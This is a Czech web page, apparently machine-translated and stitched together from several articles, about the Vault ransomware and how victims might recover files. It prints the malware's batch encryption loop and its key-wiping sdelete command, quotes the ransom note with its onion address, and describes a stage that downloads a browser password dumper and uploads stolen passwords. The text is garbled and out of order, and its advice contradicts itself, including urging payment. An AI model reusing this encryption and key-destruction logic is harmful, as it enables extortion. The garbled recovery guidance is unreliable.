Vault virus jak obnovit soubory windows xp. Jak sami obnovit soubory po viru Vault. Vault Virus - Co dělat
Antiviroví specialisté Doctor Web vyvinuli metodu pro dešifrování souborů, které se staly nepřístupnými v důsledku činnosti nebezpečného trojského kodéru. Trojan.Encoder.2843 uživatelům známý jako „Vault“.
Tato verze ransomwaru, pojmenovaná Dr.Web Trojan.Encoder.2843, aktivně šíří kyberzločinci pomocí hromadných mailing listů. Jako příloha k písmenům se používá malý soubor obsahující skript v JavaScriptu. Tento soubor je ze sebe extrahován aplikací, která provádí zbytek akcí nezbytných pro zajištění činnosti kodéru. Tato verze ransomwarového trojského koně je distribuována od 2. listopadu 2015.
Jak tohle malware taky docela zvědavý. Do systému registru systému Windows je zapsána šifrovaná dynamická knihovna (.DLL) a trojský kůň vloží malý kód do běžícího procesu explorer.exe, který načte soubor z registru do paměti, dešifruje jej a předá mu kontrolu.
Seznam zašifrovaných souborů Trojan.Encoder.2843 také skladuje v systémový registr a pro každý z nich používá jedinečný klíč skládající se z velkých latinských písmen. Soubory jsou šifrovány pomocí algoritmů Blowfish-ECB, klíč relace je šifrován pomocí RSA pomocí rozhraní CryptoAPI. Každému zašifrovanému souboru je přiřazena přípona .vault.
Specialisté Doctor Web vyvinuli speciální techniku, která v mnoha případech umožňuje dešifrování souborů poškozených tímto trojským koněm. Pokud jste obětí malwaru Trojan.Encoder.2843, použijte následující pokyny:
- kontaktovat policii s odpovídajícím prohlášením;
- za žádných okolností se nepokoušejte znovu nainstalovat operační systém, "Optimalizovat" nebo "vyčistit" pomocí jakýchkoli nástrojů;
- nemažte žádné soubory v počítači;
- nepokoušejte se obnovit zašifrované soubory sami;
- kontaktujte technickou podporu Doctor Web (tato služba je zdarma pro uživatele komerčních licencí Dr.Web);
- Připojte k lístku jakýkoli soubor zašifrovaný trojským koněm;
- počkejte na odpověď specialisty technické podpory; vzhledem k velkému počtu požadavků to může chvíli trvat.
Připomínáme, že služby dešifrování souborů jsou poskytovány pouze držitelům komerčních licencí na antivirové produkty Dr.Web. Doctor Web nezaručuje, že všechny soubory poškozené kodérem budou dešifrovány, ale naši specialisté se budou snažit zašifrované informace zachránit.
Náš článek je věnován dalšímu „majstrštyku“ hackerů – viru ransomware Vault. Řekneme vám, jaký druh viru Vault je a jak ovlivňuje systém. Podívejme se na možnosti, ve kterých můžete obnovit soubory.
Vault Virus – co dělat?!
Jednoho „krásného“ dne jste otevřeli plochu a uviděli běžící notebook s následujícím textem:
Na základě toho je jasné – stali jste se „nešťastným vlastníkem“ viru Vault. Tento virus infikuje váš počítač a začne šifrovat vaše soubory. Takto spadají do šifrování soubory s příponami .pdf, .doc, .docx, .xls, .xlsx, .jpeg, .zip atd. Po spuštění viru se k názvu souboru přidá přípona .vault. Virus také v některých případech ovlivňuje místní databáze 1C. Jak vidíte, trezor šifruje všechny dokumenty oblíbené pro práci.
Možná se ptáte: Jak se trezor dostal do mého počítače? Všechno je tak snadné jako loupání hrušek, které vám útočníci poslali e-mailem dopis. Název dopisu vypovídal o jeho důležitosti a naléhavé potřebě jej otevřít a přečíst. Může to být dopis od banky, partnerů nebo nějaká lukrativní nabídka. V tomto dopise byl přiložen dokument s příponou .js (Java skript).
Po spuštění (a vy jste jej spustili!) Toto rozšíření viru stáhne šifrovací program ze serverů hackerů. Ve vašem případě je Vault ransomware virus legitimní kryptografický software GPG (GnuPG) pomocí populárního šifrovacího algoritmu rsa-1024. Program není virus, proto jej antiviry neblokují a umožňují jeho fungování. GPG generuje veřejné (na vašem PC) a soukromé (na útočníkově serveru) šifrovací klíče.
Existuje mnoho modifikací viru Vault, například pro Windows 7/8, 32bitové nebo 64bitové systémy. A když se virus dostane do každého, chová se svým vlastním způsobem. Virus také dokáže zašifrovat počítače ve stejné síti jako váš.
Jak odstranit virus Vault z počítače?
Virus se chová tak, že se ve složce se zdrojovým souborem vytvoří soubor podobný příponě .pg. Dále tento soubor vstane, nahradí původní soubor a přidá příponu úložiště. Jednoduchým přejmenováním dokumentu se zde nezbavíte. Proto pojďme zjistit, jak obnovit soubory a odstranit virus trezoru.
Odstranění samotného viru
Jakmile na dokumentech najdete příponu trezoru, okamžitě odpojte síť a přestaňte pracovat se všemi aplikacemi, neotevírejte znovu složky na discích. Přihlásit se s bezpečný režim.
Pokud jde o odstranění, virus Vault není náročný. Odstranění není obtížné, k odstranění takových virů, scramblerů, bannerových reklam, trojských koní použijte nejoblíbenější programy. Ale problémy budou pokračovat :(.
Co potřebujete vědět je, že samotné tělo viru je skryto ve složce Temp. Virus se skládá z následujících souborů:
- 3c21b8d9.cmd;
- fabac41c.js;
- VAULT.txt;
- Sdc0.bat;
- SKLEP.KLÍČ;
- CONFIRMATION.KEY.
Všechny tyto soubory, kromě posledních dvou (!), musí být smazány. Dále spusťte čistič, vymažte spouštění, zkontrolujte registr na chyby (u Windows 7/8/10 je princip stejný). Poslední 2 soubory je třeba ponechat v počítači, protože:
- VAULT.KEY - samotný šifrovací klíč. V žádném případě se nesmí smazat! Je předán útočníkům, kteří jej analyzují, dají vám druhou část klíče k dešifrování.
- CONFIRMATION.KEY - soubor s kompletní informace o počtu zašifrovaných souborů v PC. je také nezbytný pro hackery.
Obnovte soubory s příponou .vault zdarma
Tím jsme došli k nejhorší věci – soubory zůstaly zašifrované. Pro virus trezoru neexistují žádné bezplatné dešifrovače. Pouze původní program sám dokáže dešifrovat soubory pomocí klíče rsa-1024.
Jaké jsou způsoby obnovení souborů:
![](https://i0.wp.com/itfaqs.ru/wp-content/uploads/2015/09/2015-09-23-16-30-18-%D0%A1%D0%BA%D1%80%D0%B8%D0%BD%D1%88%D0%BE%D1%82-%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0.png)
Pokud jste v Koších nic nenašli a nejsou tam žádné body obnovení systému, pak budete muset zaplatit kyberzločincům. S tím se nedá nic dělat. Z analýzy dialogů na fórech vyplývá závěr - že útočníci skutečně dešifrují soubory, ale musíte za to zaplatit. Pokud by to nebyla pravda, ústní sdělení na internetu by to už dávno šířilo a lidi by k tomu nevedli. Je třeba chápat, že se jedná o celý "obchodní systém" - jste chyceni, nyní zaplatíte a vše bude v pořádku.
Došlo to tak daleko, že na internetu už jsou superagenti! Tedy prostředníky, kteří za vás budou kontaktovat útočníky a vyřešit všechny vaše problémy. Je na vás, zda to uděláte nebo ne. Pokud to nechcete dělat sami, zaplaťte více.
Podle pokynů z textového souboru spustíte prohlížeč Tor (konkrétně pro mazání IP), poté budete přesměrováni na stránky jednoho ze stránek kyberzločinců. Existuje manuál pro práci se stránkou a dokonce i systém slev :(.
A co antivirus?
Bohužel, jak je uvedeno výše, antivirový software Dr Web, Kaspersky, Avast a další nemohou nic dělat. Koneckonců, program sám o sobě není virus. Oficiální požadavky na technickou podporu Kaspersky Lab končí podrobnými příběhy o trezoru a nabídkami k použití jejich dekodérů RannohDecryptor, ScatterDecryptor, Rector Decryptor, RakhniDecryptor nebo Xorist Decryptor. Doctor Web obecně radí v případě neoprávněného přístupu k počítači kontaktovat policii. No, díky doktore.
Jak vidíte, možností není mnoho a pokud jsou pro vás soubory opravdu důležité, budete muset zaplatit. S tím se také nedá tahat, servery s databázemi a weby se neustále přesouvají - staré se mažou a objevují se nové.
A zde je krátké video, kde můžete vidět, jak virus Vault ovlivňuje systém. Toto video není reklama :).
- S největší pravděpodobností se potýkáte s takovým problémem, jako je šifrování souborů, a tedy bez vašeho vědomí touha. Otevřením odkazu v dopise, který vám přišel poštou a nejspíš od ověřeného odesílatele, se kterým jste si již dopisovali. Ale možná jako reklama! Ale skutečnost je na vaší tváři a máte následující příznaky, které se projevují následovně:
- Vaše pracovní dokumenty a databáze byly uzamčeny a označeny ve formátu .vаult
- Chcete-li je obnovit, musíte získat jedinečný klíč
- POSTUP PRO ZÍSKÁNÍ KLÍČE:
- KRÁTCE
- 1. Přejděte na náš webový zdroj
- 2. Získejte zaručený klíč
- 3. Obnovte soubory do jejich předchozí podoby
- DETAILNÍ
- Krok 1:
- Stáhněte si prohlížeč Tor z oficiálních stránek: https://www.torproject.org
- Krok 2:
- Pomocí prohlížeče Tor navštivte web: https://restoredz4xpmuqr.onion
- Krok 3:
- Najděte svůj jedinečný klíč VAULT.KEY na svém počítači – toto je váš klíč k vašemu osobnímu klientskému panelu. Neodstraňujte to
- Přihlaste se na stránku pomocí VAULT.KEY
- Přejděte do sekce FAQ a přečtěte si další postup
- KROK 4:
- Po obdržení klíče můžete obnovit soubory pomocí našeho softwaru s otevřeným zdrojovým kódem zdrojový kód nebo je bezpečné používat váš software
- DODATEČNĚ
- a) Nebudete moci obnovit soubory bez jedinečného klíče (který je bezpečně uložen na našem serveru)
- b) Pokud nemůžete najít svůj VAULT.KEY, podívejte se do dočasné složky TEMP
- c) Vaše náklady na obnovu nejsou konečné, napište do chatu
- Datum blokování: 4. 8. 2015 (11:14)
- Podle vašeho uvážení. Můžete udělat, jak je uvedeno v souboru (ale já bych to neudělal). Proč? Protože to není spolehlivé, platit vyděračům je udržovat a rozvíjet jejich sílu. A pak, vryatli, dostanete dešifrovací klíč.
- Objevení se takové zprávy již znamená, že virus trezoru infikoval váš počítač a začal šifrovat soubory. V tomto okamžiku musíte okamžitě vypnout počítač, odpojit jej od sítě a odstranit vše vyměnitelné médium... O tom, jak virus léčit, si povíme později, ale zatím vám řeknu, co se stalo ve vašem systému.
- S největší pravděpodobností jste obdrželi dopis poštou od důvěryhodné protistrany nebo jste se za něj vydávali slavná organizace... Může to být žádost o provedení účetního odsouhlasení za určité období, žádost o potvrzení platby faktury na základě smlouvy, nabídka seznámit se s dluhem z úvěru u Sberbank nebo něco jiného. Informace ale budou takové, že vás jistě zaujmou a otevřete přílohu emailu s virem. Toto je výpočet.
- Takže otevřete přílohu, která má příponu .js a je to skript Java. Teoreticky by vás to již mělo upozornit a zabránit vám v otevření, ale pokud čtete tyto řádky, znamená to, že to neupozornilo a nezastavilo vás. Skript stáhne trojského koně nebo trezor s bannery ze serveru útočníka, jak to lze v tomto případě nazvat, a šifrovací program. Umístí to vše do dočasného adresáře uživatele. A proces šifrování souborů okamžitě začíná na všech místech, kam má uživatel přístup - síťové disky, flash disky, externí pevné disky atd.
- Vault ransomware je bezplatný nástroj pro šifrování gpg a oblíbený šifrovací algoritmus - RSA-1024. Vzhledem k tomu, že se tato utilita v podstatě používá na mnoha místech, není sama o sobě virem, antiviry ji propouštějí a neblokují její práci. Otevřený a soukromý klíč k šifrování souborů. Soukromý klíč zůstává na serveru hackerů a je otevřen na počítači uživatele.
- Po zahájení procesu šifrování uplyne nějaký čas. Záleží na více faktorech – rychlosti přístupu k souborům, výkonu počítače. Poté se objeví informační zpráva textový soubor, jehož obsah jsem uvedl hned na začátku. V tomto okamžiku jsou některé informace již zašifrovány.
- Konkrétně jsem narazil na modifikaci viru vault, který fungoval pouze na 32bitových systémech. Navíc ve Windows 7 s povoleným UAC vyskočí požadavek na heslo správce. Bez zadání hesla nemůže virus nic dělat. Na Windows XP začne fungovat ihned po otevření souboru z pošty, neptá se na nic.
- Co přesně virus se soubory dělá? Na první pohled to vypadá, že jen změní příponu ze standardní na .vault. Když jsem poprvé viděl fungování tohoto ransomwarového viru, myslel jsem si, že jde o dětskou kabeláž. Soubor jsem zpětně přejmenoval a byl jsem velmi překvapen, když se neotevřel podle očekávání a místo zamýšleného obsahu se otevřela změť nesrozumitelných znaků. Pak jsem si uvědomil, že všechno není tak jednoduché, začal jsem chápat a hledat informace.
- Virus zkontroloval všechny oblíbené typy souborů - doc, docx, xls, xlsx, jpeg, pdf a další. Ke standardnímu názvu souboru byla přidána nová přípona .vault. Pro některé také šifruje soubory s místními databázemi 1C. Takový jsem neměl, takže jsem toto osobně nepozoroval. Pouhé přejmenování souboru zpět, jak chápete, zde nepomůže.
- Protože proces šifrování není okamžitý, může se stát, že když zjistíte, že máte v počítači virus, některé soubory budou stále normální a některé infikované. Je dobré, když většina z toho zůstane nedotčená. Ale častěji se s tím nedá počítat.
- Prozradím vám, co se skrývá za změnou prodloužení. Po zašifrování například souboru.doc vedle něj vytvoří virus trezoru zašifrovaný soubor.doc.gpg, poté se zašifrovaný soubor.doc.gpg přesune do původního umístění s novým názvem soubor.doc a teprve poté se přejmenuje na soubor.doc.vault. Ukázalo se, že původní soubor není smazán, ale přepsán zašifrovaným dokumentem. Poté jej nelze obnovit pomocí standardních nástrojů pro obnovu. smazané soubory... Zde je část kódu, který implementuje tuto funkci:
- Po detekci ransomwarového viru je prvním krokem zbavit se ho vyléčením počítače. Nejlepší je bootovat z nějakého spouštěcí disk a ručně vyčistit systém. Virový trezor z hlediska korozivnosti systému není náročný, je snadné jej sami vyčistit. Nebudu se tímto bodem podrobně zabývat, protože budou stačit standardní doporučení pro odstranění ransomwarových virů, bannerů a trojských koní.
- Vlastní tělo viru se nachází v dočasné složce uživatele, který jej spustil. Virus se skládá z následujících souborů. Názvy se mohou změnit, ale struktura bude přibližně stejná:
Najednou se v poznámkovém bloku otevře textový soubor s následujícím obsahem:
Virus umístí příponu trezoru na soubory doc, jpg, xls a další
dir / B "% 1:" && for / r "% 1:" %% i in (* .xls * .doc) do (echo "%% TeMp %% \ svchost.exe" -r Sklep --yes - q --no-verbose --trust-model always --encrypt-files "%% i" ^ & move / y "%% i.gpg" "%% i" ^ & přejmenovat "%% i" "%% ~ nxi.vault ">>"% temp% \ cryptlist.lst "echo %% i >>"% temp% \ conf.list ")
Jak odstranit virus trezoru a vyléčit počítač
- 3c21b8d9.cmd
- 04fba9ba_VAULT.KEY
- CONFIRMATION.KEY
- fabac41c.js
- Sdc0.bat
- KLÍČ
- VAULT.txt
Jak obnovit a dešifrovat soubory po viru trezoru
"% temp% \ sdelete.exe" / accepteula -p 4 -q "% temp% \ secring.gpg"
Kaspersky, drweb a další antiviry v boji proti vault ransomwaru
Metody ochrany proti virům Vault
Ransomware VAULT se poprvé objevil v Rusku v únoru 2015 a získal si reputaci jeden z nejnebezpečnějších a nevyléčitelné viry. V listopadu začala druhá vlna infekcí, která byla více rozšířeného charakteru. Třetí vlna nastává v polovině ledna 2016. a překonává předchozí v počtu infikovaných zařízení.
Co je VAULT ransomware virus?
Virus VAULT je forma trojského koně kodéru.
Program proniká do počítače pomocí uživatelských akcí a zašifruje určitý typ dat desítkami algoritmů s jedinečným vzorem.
Původní data nejsou smazána, ale nahrazena daty poškozenými, což téměř znemožňuje možnost jejich obnovy.
Klíč, který umožňuje dešifrovat informace, je na konci šifrování automaticky odstraněn ze systému.
Cílem útočníků je vymámit peníze výměnou za dešifrování dat. I v tomto případě pravděpodobnost dešifrování souboru nepřesáhne 50 %.
Příklad počítače infikovaného virem VAULT: na fungující e-mail přijde požadavek na primární dokumentaci od protistrany nebo upozornění na nutnost instalace aktualizačního balíčku od ConsultantPlus. K dopisu je přiložen soubor s vysvětlujícími informacemi. Jakmile jsou spuštěny spustitelné a podpůrné soubory, začne proces šifrování dat.
Jaké soubory VAULT šifruje?
Útočníci se zajímají o komerční informace, ale i fotografie, audio a video materiály. Jsou tedy napadeny soubory s následujícími příponami: .rar, .zip, .jpg, .psd, .doc, .xls, .ppt, .pdf, .mp3, .ogg, .avi, .mpeg, .html, txt, databáze 1C atd.
Když je počítač infikován, a Textový dokument s kontakty podvodníků. Náklady na dešifrování dat se pohybují od 10 do 50 000 USD. Odhad nákladů provádějí podvodníci poté, co se uživatel dostane do kontaktu. Výše výkupného závisí na množství zašifrovaných informací. Zároveň není zaručeno, že data budou alespoň částečně obnovena.
Jak chránit svůj počítač před šifrováním VAULT?
Ve většině případů k infekci dochází, když v počítači není antivirus, nebo když bezplatná verze NA. Nejméně spolehlivý je podle nás antivirus Avast.
Oběťmi se však často stávají majitelé licencovaného balíku antivirového softwaru, včetně podnikových verzí.
Specialisté na IT bezpečnost ze společností ESET a Dr.Web vyvinuli soubor univerzálních doporučení které pomáhají chránit váš počítač nebo notebook před virem VAULT a podobnými ransomwarovými trojskými koni:
Nainstalujte důležité aktualizace operačního systému včas
zvolte antivirový software s vestavěným firewallem
zakázat vysílání a příjem spustitelné soubory(.exe) na poštovním serveru
zakázat spouštění maker v Microsoft Office nebo podobný software
cvičit pravidělně záloha data
duplikovat důležité informace na externí média
Jak odstranit VAULT z počítače?
Na tento moment Infekce virem VAULT a šifrování dat je jednorázové a nevede k infekci systémových souborů. K odstranění viru ze systému tedy stačí skenování pomocí nástroje Dr.Web CureIt. Měli byste však pamatovat na to, že pokusy o vyléčení nebo odstranění infikovaných souborů, stejně jako přeinstalace systému Windows, zruší možnost obnovit zašifrovaná data.
To znamená, že při odstraňování viru není nic těžkého, pokud jste připraveni navždy se rozloučit se zašifrovanými informacemi nebo zálohy na externích médiích.
Jak obnovit soubory VAULT?
Jakmile vy objevená infekce Viděli jsme změněné ikony souborů a nový typ přípon, například .doc.vault, okamžitě vypněte počítač nebo notebook. Čím déle běží, tím více souborů ztratíte.
Zopakujme si: skenování disku antivirem, čištění souborů, přeinstalace systému a další standardní nástroje pravděpodobnost dešifrování dat jen sníží.
Žádný z vývojářů Antivirový software stále nedokázal vytvořit nástroj k dešifrování informací vystavených VAULT.
Body obnovení systému jsou zničeny virem. Při práci s Windows Vista / 7/8/10 existuje možnost obnovit Windows ze stínových kopií pomocí nástroje Shadow Editor. Ve většině případů ale zmizí i stínové kopie.
Pokud máte licencovaný produkt NOD32 nebo Dr.Web, můžete je kontaktovat technická podpora s požadavkem na dešifrování dat.
Kromě toho odborníci doporučují kontaktovat policii s prohlášením, protože jednání útočníků vykazuje znaky trestných činů podle čl. Umění. 159.6, 163, 165, 272, 273 trestního zákoníku Ruské federace.
Praktický výsledek takového jednání je snížen na nulu. Faktem je, že zatím neexistuje způsob, jak obnovit soubory zašifrované VAULTem. Zůstává jediná cesta ven : fyzicky vyjměte HDD nebo SSD disk ze zařízení a nainstalujte nový. Možná brzy bude existovat způsob, jak dešifrovat informace a poté lze data obnovit.
Virová infekce Soubory trezoru jsou šifrované
Uživatel jako první dostane dopis se zprávou o výpisu z daně / vodoměru / faktury pro poradce klíč.
Dopis obsahoval odkaz na přiložený soubor ze zdroje download-attach.com... (hosting se zdá být placený bitcoiny) V archivu na tomto odkazu je nejzajímavější zahalený soubor js, s velmi podrobným názvem.
Když to spustíte % TEMP% uživatel objeví se několik souborů a ke spuštění se zapíše skript revault.js
Zde jsou některé soubory, které byly identifikovány:
svchost.exe - hlavní binární soubor gnupg
iconv.dll - společná knihovna pro gnupg
audiodg.exe - sDelete ze sady Sysinternals Suite
Spuštění viru Soubory trezoru jsou šifrované
V našem případě se při startu počítače spustil skript revault.js, který spustil bat soubor cryptlist.cmd. Tady se trochu ztratilo vlákno
Pak to začalo zajištěný.bat dějí se v něm všechny nejtemnější věci.
Nejprve program vygeneruje certifikát pro šifrování souborů na počítači s názvem gk.vlt (Cellar / RSA / 1024 bit)
Poté z něj exportuje soukromý klíč, který je nutný k dešifrování souborů do souboru vaultkey.vlt
Poté vytvoří veřejný klíč pk.vlt, ten je předdefinován v samotném bat souboru. Pomocí tohoto souboru bude klíč potřebný k dešifrování vašich dat v budoucnu zašifrován.
Dále ve vaultkey.vlt jsou napsány
BDATE - aktuální datum
UNAME – aktuální uživatelské jméno
CNAME – název počítače
ULANG - systémový jazyk (v tomto případě je registrován v RU)
A některé náhodné hashe 01HSH 02HSH 03HSH 04HSH 05HSH FHASH
Šifrování virů Soubory trezoru jsou šifrované
Šifrování souborů s náhradou vypadá takto
1 - Šifrování souborů
2 - Přesunutí zašifrovaného souboru do původního umístění
3 - Přidání přípony .vault do souboru
Ve fázi 1 jsou * .xls a * zašifrovány. doc soubory.
Ve 2. fázi jsou vytvořeny a spuštěny soubory win.vbs, sdwrase.js, sdwrase.cmd, což zakáže stínové kopírování v systému, pokud je systém Vista nebo vyšší
A * .pdf * jsou zašifrovány. rtf soubory.
Ve 3. fázi jsou * .psd * .dwg * zašifrovány. cdr soubory.
Ve 4. fázi jsou soubory * .cd * .mdb * .1cd * .dbf * .sqlite zašifrovány.
V 5. fázi jsou soubory * .jpg * .zip zašifrovány.
Každý soubor se spočítá a počet zašifrovaných souborů každého typu souboru se zaznamená do vaultkey.vlt
(Zřejmě pro obecné posouzení šifrovaných dat)
Dále klíč útočníka zašifruje váš soukromý klíč a shromážděné informace o množství dat.
Poté je váš klíč potřebný k dešifrování dat smazán pomocí 16 (!) Vícenásobného přepsání.
Vaše soubory jsou zašifrovány vaším klíčem a váš klíč je zašifrován klíčem útočníka.
Poté se vytvoří soubory s upozorněními.
Virový web Soubory trezoru jsou šifrované
Stránka kyberzločinců je hostována v anonymní síti TOR a je vysoce technologická pro tento druh „projektů“
Existuje plnohodnotná Osobní oblast a "demo verzi" pro 3 soubory, které ze strany útočníka dešifrují vámi stažený soubor a stahují jej z jejich serveru. ALE, než otevřete přístup k souboru, narušitel si jej ručně prohlédne a pokud bude soubor považovat za důležitý, pak k tématu přístup nezískáte, budete o tom informováni.
Je tam dokonce i sekce nápovědy.
Platba pouze bitcoiny.
Můžete také mluvit s autorem. Přemlouvání a vyhrožování je zbytečné. Útočník by vám mohl zablokovat chat.
Hesla prohlížečů – technika krádeže hesel z prohlížečů na infikovaném viru Soubory trezoru jsou šifrované počítač
Po vytvoření souborů s upozorněními následuje „bonus“
Vytvoří se skripty ultra.js a up.vbs.
První stáhne soubor z brány tor2web pomocí odkazu hxxp _ // tj2es2lrxelpknfp.onion.city/p.vlt a přejmenuje se na ssl.exe
Toto je Browser Password Dump v2.6 od SecurityXploded
Ukládá všechna vaše hesla z prohlížečů do cookie.vlt
Poté druhý soubor začne nahrávat vaše hesla na stejný server (POST do skriptu /x.php)
Tento server je anonymizován stejným způsobem jako server pro obnovu a platbu (nic navíc v záhlaví, řádek Server: Anon)